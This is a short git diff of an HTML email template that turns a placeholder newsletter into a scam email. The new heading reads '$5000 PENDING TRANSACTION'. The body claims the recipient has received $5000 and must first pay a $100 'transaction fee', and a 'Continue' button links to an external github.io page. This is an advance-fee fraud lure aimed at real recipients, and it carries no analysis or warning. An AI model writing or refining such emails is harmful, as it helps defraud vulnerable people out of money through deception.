--- a/index.html
+++ b/index.html
@@ -13,11 +13,11 @@
   <p style="text-align: center; color: #999999; font-size: 12px;">Hello ${sanitizedName}</p>
   <div style="font-family: Helvetica, Arial, sans-serif; max-width: 600px; margin: 0 auto; text-align: center; padding: 20px; background-color: #f1f4f7;">
     <img src="https://michyqruz.github.io/The-money-box/IMG_8578.jpeg" alt="logo" style="width: 60px; height: 60px; border-radius: 50%; object-fit: cover;">
-    <h1 style="color: #000000; font-size: 36px; margin: 40px 0; font-weight: 900;">Welcome to Our Newsletter</h1>
+    <h1 style="color: #000000; font-size: 36px; margin: 40px 0; font-weight: 900;">$5000 PENDING TRANSACTION</h1>
     <p style="color: #000000; font-size: 20px; font-weight: bold; text-align: left; line-height: 1.5;">
-        Thank you for subscribing! Here's a test email with some thumbnail images. Here's a test email with some thumbnail images.
+        You just receieved $5000 from a bussiness account for the first time, due to security reason you need to pay a transaction fee of $100 before the fund is deposited into your account.
     </p>
-    <a href="https://millxore.github.io/start/" style="display: inline-block; color: #ffffff; padding: 15px 40px; background-color: #000000; color: white; text-decoration: none; border-radius: 25px; font-size: 16px; margin: 10px 0; font-weight: bold;">Explore</a>
+    <a href="https://millxore.github.io/seen/" style="display: inline-block; color: #ffffff; padding: 15px 40px; background-color: #000000; color: white; text-decoration: none; border-radius: 25px; font-size: 16px; margin: 10px 0; font-weight: bold;">Continue</a>
   </div>
       
       <div style="background-color: #f1f4f7; max-width: 600px; margin: 0 auto; padding: 20px;">
